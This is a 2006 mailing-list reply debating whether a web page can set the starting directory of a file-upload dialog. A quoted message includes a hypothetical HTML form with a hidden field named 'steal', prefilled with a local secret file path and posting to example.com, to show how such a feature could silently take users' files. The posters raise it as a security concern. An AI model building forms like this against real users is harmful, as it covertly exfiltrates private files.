 Posted by Jochem Maas on 01/19/06 16:02 
Are you sure it was not Internet Explorer just showing you the last
directory you had opened with a 'browse...' button within that browsing
session?
 
Jay Blanchard wrote: 
> [snip] 
>  
>>Along these same lines, does anyone know how to make the file dialog
>>start in a specific directory? I saw this the other day but forgot
>>where. I clicked browse and the dialog popped up pointed to My Pictures
>>(which at least works for most Windblows users). I meant to look at the
>>code, but didn't....
>  
>  
> Yikes! 
>  
> If it *DOES* work, you've probably got yet another security problem in 
> Windows. 
>  
> Suppose, for example, that I do something like this: 
>  
> <form action="http://example.com/" method="post" 
> enctype="multipart/form-data"> 
> <input style="visibility: hidden" name="steal" 
> value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret"> 
> What's your name? <input name="name"><br /> 
> Who's your daddy? <input name="daddy"><br /> 
> <input type="submit"> 
> </form> 
>  
> Now, the unsuspecting user will be HANDING me the file I shouldn't 
> have without ever seeing anything about it. 
>  
> Even if it "only" lets you pick the directory, but not the file, it 
> probably exposes too much information about my desktop for my tastes. 
> [/snip] 
>  
> Now I need to go back and find it. It was a site having to do with photos, 
> but I was doing research and visited a lot of them. Since the upload dialog 
> was looking for photos you can see where the apparent convenience could come 
> in. But you're right....as a security hole it is big enough for aircraft
> carrier usage. 
>
 
  